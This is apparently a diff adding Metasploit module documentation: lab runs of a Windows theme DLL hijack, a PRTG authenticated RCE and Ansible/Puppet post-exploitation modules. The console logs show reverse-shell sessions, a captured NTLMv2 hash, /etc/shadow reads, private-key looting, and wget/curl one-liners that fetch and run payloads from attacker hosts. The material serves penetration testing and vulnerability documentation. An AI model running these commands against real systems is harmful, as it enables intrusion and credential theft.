+   STYLE_FILE                        yes       The Microsoft-signed .msstyles file (e.g. aero.msstyles).
+   STYLE_FILE_NAME                   yes       The name of the style file to reference.
+   THEME_FILE_NAME  exploit.theme    yes       The name of the theme file to generate.
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set SRVHOST 10.5.135.201
+SRVHOST => 10.5.135.201
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE '/home/tmoose/rapid7/metasploit-framework/aero.msstyles' 
+STYLE_FILE => /home/tmoose/rapid7/metasploit-framework/aero.msstyles
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set STYLE_FILE_NAME aero
+STYLE_FILE_NAME => aero
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > set verbose true
+verbose => true
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > 
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Server is running. Listening on 10.5.135.201:445
+[*] Server started.
+[+] exploit.theme stored at /home/tmoose/.msf4/local/exploit.theme
+[*] Received SMB connection from 10.5.132.136
+[SMB] NTLMv2-SSP Client     : 10.5.132.136
+[SMB] NTLMv2-SSP Username   : .\msfuser
+[SMB] NTLMv2-SSP Hash       : msfuser::.:571cefb4150fb5f1:059699f9eee7e044d95167c03c58c6b4:010100000000000000326d46a633da013654631d1e8ef262000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f00550050000700080000326d46a633da0106000400020000000800300030000000000000000100000000200000fe746065d66cc1efc7756d546af110124dd7d6b60126a5edff7b41cce14019d90a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e003200300031000000000000000000
+
+[*] Sending file to 10.5.132.136
+[*] Sending stage (200774 bytes) to 10.5.132.136
+[*] Server stopped.
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.136:50003) at 2023-12-20 18:40:25 -0600
+
+msf6 exploit(windows/fileformat/theme_dll_hijack_cve_2023_38146) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo
+Computer        : DESKTOP-7M0LC28
+OS              : Windows 11 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: DESKTOP-7M0LC28\msfuser
+meterpreter > 
+
+```
@@ -0,0 +1,124 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a command line parameter injection vulnerability in PRTG Network Monitor (CVE-2023-32781).
+
+An authenticated attacker can create a HL7Sensor which can be ran with a parameter injection. This will allow the attacker to specify the `-debug` parameter which will allow a arbitrary file write on the system in the context of the user `SYSTEM`.
+
+The module uses provided credentials to log in to the web interface, and then creates the HL7Sensor, together with an EXE/Script sensor which runs the payload. Furthermore it cleans up the sensor creation after succesful exploitation.
+
+This vulnerability affects versions  <= 23.2.83.1760
+
+**Vulnerable Application Installation**
+
+PRTG provides a trial version for free (https://www.paessler.com/prtg/download) but it is always updated to the latest version, which won't allow you to test for the vulnerability.
+
+**Successfully tested on**
+
+- PRTG Network Monitor 23.2.83.1760 on Windows 10
+
+## Verification Steps
+1. Install the application
+1. Start `msfconsole` and run the following:
+
+```
+use exploit/windows/http/prtg_authenticated_rce_cve_2023_32781
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(windows/http/prtg_authenticated_rce_cve_2023_32781) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(windows/http/prtg_authenticated_rce_cve_2023_32781) > set RPORT 13380
+RPORT => 13380
+msf6 exploit(windows/http/prtg_authenticated_rce_cve_2023_32781) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf6 exploit(windows/http/prtg_authenticated_rce_cve_2023_32781) > set SRVPORT 10106
+SRVPORT => 10106
+msf6 exploit(windows/http/prtg_authenticated_rce_cve_2023_32781) > set LPORT 4446
+LPORT => 4445
+msf6 exploit(windows/http/prtg_authenticated_rce_cve_2023_32781) > set LHOST 192.168.56.1
+msf6 exploit(windows/http/prtg_authenticated_rce_cve_2023_32781) > exploit
+```
+
+`RHOSTS` refers to the PRTG host
+`RPORT` refers to the PRTG port
+`SRVHOST` refers to the host where metasploit will serve the second stage payload. This has to be reachable by `PRTG`
+`SRVPORT` refers to the port where metasploit will serve the second stage payload. This has to be reachable by `PRTG`
+`LPORT` refers to the payload connect port back which in this instance is meterpreter
+`LHOST` refers to the payload connect host back which in this instance is meterpreter
+
+After running this you should have a meterpreter instance
+
+
+## Options
+**USERNAME**
+
+PRTG Network Monitor's account that has the right to create Sensors (allowed by default on the initial account).
+
+**PASSWORD**
+
+The password associated with the specified username.
+
+
+## Scenarios
+
+Running the payload and getting a meterpreter session and then spawning a shell as `nt authority\system`
+
+```bash
+msf6 > use exploit/development/cve_2023_32781
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf6 exploit(development/cve_2023_32781) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 exploit(development/cve_2023_32781) > set RPORT 13380
+RPORT => 13380
+msf6 exploit(development/cve_2023_32781) > set SRVHOST 192.168.56.1
+SRVHOST => 192.168.56.1
+msf6 exploit(development/cve_2023_32781) > set SRVPORT 10106
+SRVPORT => 10106
+msf6 exploit(development/cve_2023_32781) > set LPORT 4446
+LPORT => 4445
+msf6 exploit(development/cve_2023_32781) > set LHOST 192.168.56.1
+msf6 exploit(development/cve_2023_32781) > exploit
+
+[*] Started reverse TCP handler on 192.168.56.1:4446 
+[*] Using URL: http://192.168.56.1:10105/sF321hmEZCz
+[*] Running PRTG RCE exploit
+[+] Successfully authenticated against PRTG
+[*] Writing .bat to disk
+[*] Extracted csrf token: OWVlYTZkYzQwYmEwNDlkZmQ5ZGJiZDQ2OWVkYWU3YTEwZjYxODE4MzM2Y2U4ZGVmZGY1OTFlNzEwOWIxNDMwMA==
+[*] Generated sensor_name Wg83qiZvO
+[*] Generated bat_file_name rjKu8O2Pt.bat
+[+] HL7 Sensor succesfully created
+[*] Sleeping 5 seconds to wait for sensor creation
+[*] Fetching created sensor id
+[*] Extracted sensor_id: 2095
+[*] Requesting HL7 Sensor to initiate scan
+[*] Extracted csrf token: OWVlYTZkYzQwYmEwNDlkZmQ5ZGJiZDQ2OWVkYWU3YTEwZjYxODE4MzM2Y2U4ZGVmZGY1OTFlNzEwOWIxNDMwMA==
+[+] Sensor started running
+[+] .bat file written to disk
+[*] Running the .bat file: rjKu8O2Pt.bat
+[*] Extracted csrf token: OWVlYTZkYzQwYmEwNDlkZmQ5ZGJiZDQ2OWVkYWU3YTEwZjYxODE4MzM2Y2U4ZGVmZGY1OTFlNzEwOWIxNDMwMA==
+[*] EXE Script sensor created
+[*] Sleeping 5 seconds to wait for sensor creation
+[*] Fetching created sensor id
+[*] Extracted sensor_id: 2096
+[*] Extracted csrf token: OWVlYTZkYzQwYmEwNDlkZmQ5ZGJiZDQ2OWVkYWU3YTEwZjYxODE4MzM2Y2U4ZGVmZGY1OTFlNzEwOWIxNDMwMA==
+[+] Sensor started running
+[+] Exploit completed. Waiting for payload
+[*] Exploit done
+[*] Command Stager progress - 100.00% done (150/150 bytes)
+[*] Client 192.168.56.1 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.2428) requested /sF321hmEZCz
+[*] Sending payload to 192.168.56.1 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.2428)
+[*] Sending stage (175686 bytes) to 192.168.56.1
+[*] Meterpreter session 1 opened (192.168.56.1:4446 -> 192.168.56.1:43926) at 2023-11-23 17:06:34 +0000
+[*] Server stopped.
+
+meterpreter > shell
+Process 4280 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.22621.2428]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Windows\System32>whoami
+whoami
+nt authority\system
+```
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+This module will grab ansible information including hosts, ping status, and the configuration file.
+
+### Docker-compose Install
+
+Use the ansible lab files located [here](https://github.com/abdennour/ansible-lab-environment-in-containers).
+
+Before bringing up the `docker-compose` instance, you'll want to generate an SSH key: `ssh-keygen -t rsa -N "" -f secrets/id_rsa`
+
+Of note, only 1 of the 3 alpine hosts will be successful due to the port conflict. This is fine though.
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use post/linux/gather/ansible`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should get information about the ansible install and host.
+
+## Options
+
+### ANSIBLE
+
+Location of ansible executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible`. Defaults to ``
+
+### ANSIBLEINVENTORY
+
+Location of ansible-inventory executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible-inventory`. Defaults to ``
+
+### ANSIBLECFG
+
+Location of ansible-inventory executable if not in a standard location. This is added to a list of default locations
+which includes `/etc/ansible/ansible.cfg`. Defaults to ``
+
+### HOSTS
+
+Which Ansible host (groups) to target. Defaults to `all`
+
+## Scenarios
+
+### Docker compose as mentioned above
+
+Get initial access to the system
+
+```
+resource (ansible.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (ansible.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (ansible.rb)> set srvport 8181
+srvport => 8181
+resource (ansible.rb)> set target 7
+target => 7
+resource (ansible.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (ansible.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/qsmOaSn61Y
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO D418BdOM --no-check-certificate http://1.1.1.1:8181/qsmOaSn61Y; chmod +x D418BdOM; ./D418BdOM& disown
+[*] Starting persistent handler(s)...
+[*] Sending stage (3045380 bytes) to 172.28.0.3
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.28.0.3:52506) at 2023-12-13 12:32:03 -0500
+```
+
+
+```
+resource (ansible.rb)> use post/linux/gather/ansible
+resource (ansible.rb)> set ANSIBLECFG /playbook/ansible.cfg
+ANSIBLECFG => /playbook/ansible.cfg
+resource (ansible.rb)> set session 1
+session => 1
+resource (ansible.rb)> set verbose true
+verbose => true
+[msf](Jobs:1 Agents:2) post(linux/gather/ansible) > run
+
+[+] Stored inventory to: /root/.msf4/loot/20231213123519_default_172.28.0.3_ansible.inventor_801476.json
+[+] Ansible Hosts
+=============
+
+ Host                       Connection
+ ----                       ----------
+ alpine-example-com         ssh
+ alpinesystemd-example-com  docker
+ centos7-example-com        docker
+ rhel8-example-com          docker
+
+[+] Stored pings to: /root/.msf4/loot/20231213123529_default_172.28.0.3_ansible.ping_007951.txt
+[+] Ansible Pings
+=============
+
+ Host                       Status   Ping  Changed
+ ----                       ------   ----  -------
+ alpine-example-com         SUCCESS  pong  false
+ alpinesystemd-example-com  SUCCESS  pong  false
+ centos7-example-com        SUCCESS  pong  false
+ rhel8-example-com          SUCCESS  pong  false
+
+[+] Stored config to: /root/.msf4/loot/20231213123530_default_172.28.0.3_ansible.cfg_563982.txt
+[+] Private key file location: /secrets/id_rsa
+[+] Stored private key file to: /root/.msf4/loot/20231213123530_default_172.28.0.3_ansible.private._084820.txt
+[*] Post module execution completed
+```
@@ -0,0 +1,109 @@
+## Vulnerable Application
+
+This module will read the first line of a file based on an error message from ansible-playbook with sudo privileges.
+ansible-playbook takes a yaml file as input, and if there is an error, such as a non-yaml file, it outputs the line
+where the error occurs. This can be exploited to read the first line of the file, which we'll typically want to read
+/etc/shadow to obtain root's hash.
+
+### Docker-compose Install
+
+Use the ansible lab files located [here](https://github.com/abdennour/ansible-lab-environment-in-containers).
+
+Before bringing up the `docker-compose` instance, you'll want to generate an SSH key: `ssh-keygen -t rsa -N "" -f secrets/id_rsa`
+
+Of note, only 1 of the 3 alpine hosts will be successful due to the port conflict. This is fine though.
+
+Next you'll need to add a user:
+
+```
+docker exec -it ansible-lab-environment-in-containers_controlnode_1 /bin/sh
+useradd user
+chmod o+w /etc/sudoers
+echo -ne "\nuser ALL=(ALL) NOPASSWD: /usr/local/bin/ansible-playbook *\n" >> /etc/sudoers
+chmod o-w /etc/sudoers
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use post/linux/gather/ansible_playbook_error_message_file_reader`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should be able to read the top line of a file.
+
+## Options
+
+### ANSIBLEPLAYBOOK
+
+Location of ansible-playbook executable if not in a standard location. This is added to a list of default locations
+which includes `/usr/local/bin/ansible-playbook`, `/usr/bin/ansible-playbook`. Defaults to ``
+
+### FILE
+
+File to be read. Defaults to `/etc/shadow`
+
+### FULLOUTPUT
+
+If the entire command output should be displayed, or only the error line. Defaults to `false`
+
+## Scenarios
+
+### Docker compose as mentioned above
+
+Get initial access to the system
+
+```
+resource (ansible_playbook.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (ansible_playbook.rb)> set lhost 192.168.2.128
+lhost => 192.168.2.128
+resource (ansible_playbook.rb)> set srvport 8181
+srvport => 8181
+resource (ansible_playbook.rb)> set lport 8183
+lport => 8183
+resource (ansible_playbook.rb)> set target 7
+target => 7
+resource (ansible_playbook.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (ansible_playbook.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.2.128:8183 
+
+[*] Using URL: http://192.168.2.128:8181/I5062GM5P5Avgu
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO lAM5H81x --no-check-certificate http://192.168.2.128:8181/I5062GM5P5Avgu; chmod +x lAM5H81x; ./lAM5H81x& disown
+
+[*] Starting persistent handler(s)...
+[*] 172.28.0.3       web_delivery - Delivering Payload (250 bytes)
+[*] Sending stage (3045380 bytes) to 172.28.0.3
+[*] Meterpreter session 1 opened (192.168.2.128:8183 -> 172.28.0.3:37216) at 2023-12-13 14:58:36 -0500
+[msf](Jobs:1 Agents:1) post(linux/gather/ansible_playbook_error_message_file_reader) > sessions -i 1
+[*] Starting interaction with 1...
+
+(Meterpreter 1)(/playbook) > getuid
+Server username: user
+(Meterpreter 1)(/playbook) > cat /etc/shadow
+[-] core_channel_open: Operation failed: 1
+(Meterpreter 1)(/playbook) > background
+[*] Backgrounding session 1...
+```
+
+```
+resource (ansible_playbook.rb)> use post/linux/gather/ansible_playbook_error_message_file_reader
+resource (ansible_playbook.rb)> set session 1
+session => 1
+resource (ansible_playbook.rb)> set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) post(linux/gather/ansible_playbook_error_message_file_reader) > run
+
+[*] Checking sudo
+[*] Executing: sudo -n -l
+[*] Executing: sudo -n /usr/local/bin/ansible-playbook /etc/shadow
+[+] root:!::0:::::
+[*] Post module execution completed
+```
@@ -0,0 +1,386 @@
+## Vulnerable Application
+
+This module will grab Puppet config files, credentials, host information, and file buckets
+
+### Docker-compose Install
+
+Use the puppet files located [here](https://github.com/voxpupuli/crafty/tree/main/puppet/oss) by following this script:
+
+```
+mkdir /tmp/puppet
+wget https://raw.githubusercontent.com/voxpupuli/crafty/main/puppet/oss/.env -O /tmp/puppet/.env
+wget https://raw.githubusercontent.com/voxpupuli/crafty/main/puppet/oss/compose.yaml -O /tmp/puppet/compose.yaml
+docker-compose -f /tmp/puppet/compose.yaml up
+```
+
+Now build out some content so theres interesting things to pull:
+
+```
+docker exec -it puppet_puppet_1 /bin/bash
+echo test >> /tmp/TestFile
+puppet filebucket -l backup /tmp/TestFile
+
+puppet module install puppetlabs-apache
+```
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Get an initial shell on the box
+1. Do: `use post/linux/gather/puppet`
+1. Do: `set session [#]`
+1. Do: `run`
+1. You should get information about the puppet install and host.
+
+## Options
+
+### FILEBUCKET
+
+If file bucket items should be pulled. Defaults to `true`
+
+### PUPPET
+
+Location of puppet executable if not in a standard location. This is added to a list of default locations
+which includes `/opt/puppetlabs/puppet/bin/puppet`.
+
+### FACTER
+
+Location of facter executable if not in a standard location. This is added to a list of default locations
+which includes `/opt/puppetlabs/puppet/bin/facter`.
+
+## Scenarios
+
+### Docker compose as mentioned above
+
+Get initial access to the system
+
+```
+resource (puppet.rb)> use exploit/multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (puppet.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (puppet.rb)> set srvport 8181
+srvport => 8181
+resource (puppet.rb)> set target 7
+target => 7
+resource (puppet.rb)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (puppet.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Using URL: http://1.1.1.1:8181/Gc7zrm8CdKGSe2
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO CmKyTd1N --no-check-certificate http://1.1.1.1:8181/Gc7zrm8CdKGSe2; chmod +x CmKyTd1N; ./CmKyTd1N& disown
+[*] Sending stage (3045380 bytes) to 172.20.0.3
+[msf](Jobs:1 Agents:0) post(linux/gather/puppet) > [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 172.20.0.3:59338) at 2023-12-10 10:38:11 -0500
+```
+
+We now have a `wget` command, however the system doesn't have `wget`. Alter it to a `curl`
+command similar to `curl http://1.1.1.1:8181/Gc7zrm8CdKGSe2 > uBgZi2eZ; chmod +x uBgZi2eZ; ./uBgZi2eZ& disown`
+
+You'll now need to get on the docker image: `docker exec -it puppet_puppet_1 /bin/bash` and run the `curl`` command.
+
+```
+resource (puppet.rb)> use post/linux/gather/puppet
+resource (puppet.rb)> set session 1
+resource (puppet.rb)> set verbose true
+verbose => true
+[msf](Jobs:1 Agents:1) post(linux/gather/puppet) > run
+
+[+] Stored puppet config to: /root/.msf4/loot/20231210104539_default_172.20.0.3_puppet.conf_250032.txt
+[+] Puppet Configuration
+====================
+
+ Parameter  Value                                        Loot Location
+ ---------  -----                                        -------------
+ cacert     /etc/puppetlabs/puppetserver/ca/ca_crt.pem   /root/.msf4/loot/20231210104540_default_172.20.0.3_etcpuppetlabs_837639.txt
+ cakey      /etc/puppetlabs/puppetserver/ca/ca_key.pem   /root/.msf4/loot/20231210104540_default_172.20.0.3_etcpuppetlabs_098956.txt
+ passfile   /etc/puppetlabs/puppet/ssl/private/password
+ server     puppet
+ user       puppet
+
+[+] Puppet Modules
+==============
+
+ Module             Version
+ ------             -------
+ puppetlabs-apache  v11.1.0
+ puppetlabs-concat  v9.0.1
+ puppetlabs-stdlib  v9.4.1
+
+[*] Retrieving filebucket contents: /tmp/TestFile
+[+] Puppet Filebucket Files
+=======================
+
+ Hash                                                              Date                 Filename       Loot location
+ ----                                                              ----                 --------       -------------
+ 9252a75c942da16f7b52cab752797dea4fca18474db9d7eff102842a459b25b3  2023-12-09 12:17:58  /tmp/TestFile  /root/.msf4/loot/20231210104544_default_172.20.0.3_puppet.filebucke_189638.txt
+
+[+] Stored facter to: /root/.msf4/loot/20231210104545_default_172.20.0.3_puppet.facter_436612.txt
+[+] Stored packages to: /root/.msf4/loot/20231210104547_default_172.20.0.3_puppet.packages_320990.txt
+[+] Puppet Packages
+===============
+
+ Package                   Version                                  Source
+ -------                   -------                                  ------
+ adduser                   3.118ubuntu5                             apt
+ apt                       2.4.10                                   apt
+ base-files                12ubuntu4.4                              apt
+ base-passwd               3.5.52build1                             apt
+ base64                    0.2.0                                    puppet_gem
+ bash                      5.1-6ubuntu1                             apt
+ benchmark                 0.1.0                                    puppet_gem
+ bigdecimal                2.0.0                                    puppet_gem
+ bsdutils                  1:2.37.2-4ubuntu3                        apt
+ bundler                   2.1.4                                    puppet_gem
+ ca-certificates           20230311ubuntu0.22.04.1                  apt
+ ca-certificates-java      20190909ubuntu1.2                        apt
+ cgi                       0.1.0.2                                  puppet_gem
+ colored2                  3.1.2                                    puppet_gem
+ concurrent-ruby           1.1.9                                    puppet_gem
+ coreutils                 8.32-4.1ubuntu1                          apt
+ cri                       2.15.11                                  puppet_gem
+ csv                       3.1.2                                    puppet_gem
+ dash                      0.5.11+git20210903+057cd650a4ed-3build1  apt
+ date                      3.0.3                                    puppet_gem
+ debconf                   1.5.79ubuntu1                            apt
+ debianutils               5.5-1ubuntu2                             apt
+ deep_merge                1.2.2                                    puppet_gem
+ delegate                  0.1.0                                    puppet_gem
+ did_you_mean              1.4.0                                    puppet_gem
+ diffutils                 1:3.8-0ubuntu2                           apt
+ dpkg                      1.21.1ubuntu2.2                          apt
+ dumb-init                 1.2.5                                    apt
+ e2fsprogs                 1.46.5-2ubuntu1.1                        apt
+ erubi                     1.12.0                                   puppet_gem
+ etc                       1.1.0                                    puppet_gem
+ facter                    4.5.1                                    puppet_gem
+ faraday                   2.7.11                                   puppet_gem
+ faraday-follow_redirects  0.3.0                                    puppet_gem
+ faraday-net_http          3.0.2                                    puppet_gem
+ fast_gettext              2.3.0                                    puppet_gem
+ fcntl                     1.0.0                                    puppet_gem
+ ffi                       1.15.5                                   puppet_gem
+ fiddle                    1.0.0                                    puppet_gem
+ fileutils                 1.4.1                                    puppet_gem
+ findutils                 4.8.0-1ubuntu3                           apt
+ fontconfig-config         2.13.1-4.2ubuntu5                        apt
+ fonts-dejavu-core         2.37-2build1                             apt
+ forwardable               1.3.1                                    puppet_gem
+ gcc-12-base               12.3.0-1ubuntu1~22.04                    apt
+ getoptlong                0.1.0                                    puppet_gem
+ gettext                   3.4.9                                    puppet_gem
+ gettext-setup             1.1.0                                    puppet_gem
+ git                       1:2.34.1-1ubuntu1.10                     apt
+ git-man                   1:2.34.1-1ubuntu1.10                     apt
+ gpgv                      2.2.27-3ubuntu2.1                        apt
+ grep                      3.7-1build1                              apt
+ gzip                      1.10-4ubuntu4.1                          apt
+ hiera                     3.12.0                                   puppet_gem
+ hiera-eyaml               3.4.0                                    puppet_gem
+ highline                  2.1.0                                    puppet_gem
+ hocon                     1.3.1                                    puppet_gem
+ hostname                  3.23ubuntu2                              apt
+ init-system-helpers       1.62                                     apt
+ io-console                0.5.6                                    puppet_gem
+ ipaddr                    1.2.2                                    puppet_gem
+ irb                       1.2.6                                    puppet_gem
+ java-common               0.72build2                               apt
+ json                      2.3.0                                    puppet_gem
+ jwt                       2.7.1                                    puppet_gem
+ libacl1                   2.3.1-1                                  apt
+ libapt-pkg6.0             2.4.10                                   apt
+ libasound2                1.2.6.1-1ubuntu1                         apt
+ libasound2-data           1.2.6.1-1ubuntu1                         apt
+ libattr1                  1:2.5.1-1build1                          apt
+ libaudit-common           1:3.0.7-1build1                          apt
+ libaudit1                 1:3.0.7-1build1                          apt
+ libavahi-client3          0.8-5ubuntu5.1                           apt
+ libavahi-common-data      0.8-5ubuntu5.1                           apt
+ libavahi-common3          0.8-5ubuntu5.1                           apt
+ libblkid1                 2.37.2-4ubuntu3                          apt
+ libbrotli1                1.0.9-2build6                            apt
+ libbsd0                   0.11.5-1                                 apt
+ libbz2-1.0                1.0.8-5build1                            apt
+ libc-bin                  2.35-0ubuntu3.4                          apt
+ libc6                     2.35-0ubuntu3.4                          apt
+ libcap-ng0                0.7.9-2.2build3                          apt
+ libcap2                   1:2.44-1ubuntu0.22.04.1                  apt
+ libcom-err2               1.46.5-2ubuntu1.1                        apt
+ libcrypt1                 1:4.4.27-1                               apt
+ libcups2                  2.4.1op1-1ubuntu4.7                      apt
+ libcurl3-gnutls           7.81.0-1ubuntu1.14                       apt
+ libdb5.3                  5.3.28+dfsg1-0.8ubuntu3                  apt
+ libdbus-1-3               1.12.20-2ubuntu4.1                       apt
+ libdebconfclient0         0.261ubuntu1                             apt
+ liberror-perl             0.17029-1                                apt
+ libexpat1                 2.4.7-1ubuntu0.2                         apt
+ libext2fs2                1.46.5-2ubuntu1.1                        apt
+ libffi8                   3.4.2-4                                  apt
+ libfontconfig1            2.13.1-4.2ubuntu5                        apt
+ libfreetype6              2.11.1+dfsg-1ubuntu0.2                   apt
+ libgcc-s1                 12.3.0-1ubuntu1~22.04                    apt
+ libgcrypt20               1.9.4-3ubuntu3                           apt
+ libgdbm-compat4           1.23-1                                   apt
+ libgdbm6                  1.23-1                                   apt
+ libglib2.0-0              2.72.4-0ubuntu2.2                        apt
+ libgmp10                  2:6.2.1+dfsg-3ubuntu1                    apt
+ libgnutls30               3.7.3-4ubuntu1.2                         apt
+ libgpg-error0             1.43-3                                   apt
+ libgraphite2-3            1.3.14-1build2                           apt
+ libgssapi-krb5-2          1.19.2-2ubuntu0.2                        apt
+ libharfbuzz0b             2.7.4-1ubuntu3.1                         apt
+ libhogweed6               3.7.3-1build2                            apt
+ libidn2-0                 2.3.2-2build1                            apt
+ libjpeg-turbo8            2.1.2-0ubuntu1                           apt
+ libjpeg8                  8c-2ubuntu10                             apt
+ libk5crypto3              1.19.2-2ubuntu0.2                        apt
+ libkeyutils1              1.6.1-2ubuntu3                           apt
+ libkrb5-3                 1.19.2-2ubuntu0.2                        apt
+ libkrb5support0           1.19.2-2ubuntu0.2                        apt
+ liblcms2-2                2.12~rc1-2build2                         apt
+ libldap-2.5-0             2.5.16+dfsg-0ubuntu0.22.04.1             apt
+ liblz4-1                  1.9.3-2build2                            apt
+ liblzma5                  5.2.5-2ubuntu1                           apt
+ libmd0                    1.0.4-1build1                            apt
+ libmount1                 2.37.2-4ubuntu3                          apt
+ libncurses6               6.3-2ubuntu0.1                           apt
+ libncursesw6              6.3-2ubuntu0.1                           apt
+ libnettle8                3.7.3-1build2                            apt
+ libnghttp2-14             1.43.0-1build3                           apt
+ libnsl2                   1.3.0-2build2                            apt
+ libnspr4                  2:4.32-3build1                           apt
+ libnss3                   2:3.68.2-0ubuntu1.2                      apt
+ libp11-kit0               0.24.0-6build1                           apt
+ libpam-modules            1.4.0-11ubuntu2.3                        apt
+ libpam-modules-bin        1.4.0-11ubuntu2.3                        apt
+ libpam-runtime            1.4.0-11ubuntu2.3                        apt
+ libpam0g                  1.4.0-11ubuntu2.3                        apt
+ libpcre2-8-0              10.39-3ubuntu0.1                         apt
+ libpcre3                  2:8.39-13ubuntu0.22.04.1                 apt
+ libpcsclite1              1.9.5-3ubuntu1                           apt
+ libperl5.34               5.34.0-3ubuntu1.2                        apt
+ libpng16-16               1.6.37-3build5                           apt
+ libprocps8                2:3.3.17-6ubuntu2                        apt
+ libpsl5                   0.21.0-1.2build2                         apt
+ librtmp1                  2.4+20151223.gitfa8646d.1-2build4        apt
+ libsasl2-2                2.1.27+dfsg2-3ubuntu1.2                  apt
+ libsasl2-modules-db       2.1.27+dfsg2-3ubuntu1.2                  apt
+ libseccomp2               2.5.3-2ubuntu2                           apt
+ libselinux1               3.3-1build2                              apt
+ libsemanage-common        3.3-1build2                              apt
+ libsemanage2              3.3-1build2                              apt
+ libsepol2                 3.3-1build1                              apt
+ libsmartcols1             2.37.2-4ubuntu3                          apt
+ libsqlite3-0              3.37.2-2ubuntu0.1                        apt
+ libss2                    1.46.5-2ubuntu1.1                        apt
+ libssh-4                  0.9.6-2ubuntu0.22.04.1                   apt
+ libssl3                   3.0.2-0ubuntu1.10                        apt
+ libstdc++6                12.3.0-1ubuntu1~22.04                    apt
+ libsystemd0               249.11-0ubuntu3.10                       apt
+ libtasn1-6                4.18.0-4build1                           apt
+ libtinfo6                 6.3-2ubuntu0.1                           apt
+ libtirpc-common           1.3.2-2ubuntu0.1                         apt
+ libtirpc3                 1.3.2-2ubuntu0.1                         apt
+ libudev1                  249.11-0ubuntu3.10                       apt
+ libunistring2             1.0-1                                    apt
+ libuuid1                  2.37.2-4ubuntu3                          apt
+ libx11-6                  2:1.7.5-1ubuntu0.3                       apt
+ libx11-data               2:1.7.5-1ubuntu0.3                       apt
+ libxau6                   1:1.0.9-1build5                          apt
+ libxcb1                   1.14-3ubuntu3                            apt
+ libxdmcp6                 1:1.1.3-0ubuntu5                         apt
+ libxext6                  2:1.3.4-1build1                          apt
+ libxi6                    2:1.8-1build1                            apt
+ libxrender1               1:0.9.10-1build4                         apt
+ libxtst6                  2:1.2.3-1build4                          apt
+ libxxhash0                0.8.1-1                                  apt
+ libzstd1                  1.4.8+dfsg-3build1                       apt
+ locale                    2.1.3                                    puppet_gem
+ log4r                     1.1.10                                   puppet_gem
+ logger                    1.4.2                                    puppet_gem
+ login                     1:4.8.1-2ubuntu2.1                       apt
+ logsave                   1.46.5-2ubuntu1.1                        apt
+ lsb-base                  11.1.0ubuntu4                            apt
+ matrix                    0.2.0                                    puppet_gem
+ mawk                      1.3.4.20200120-3                         apt
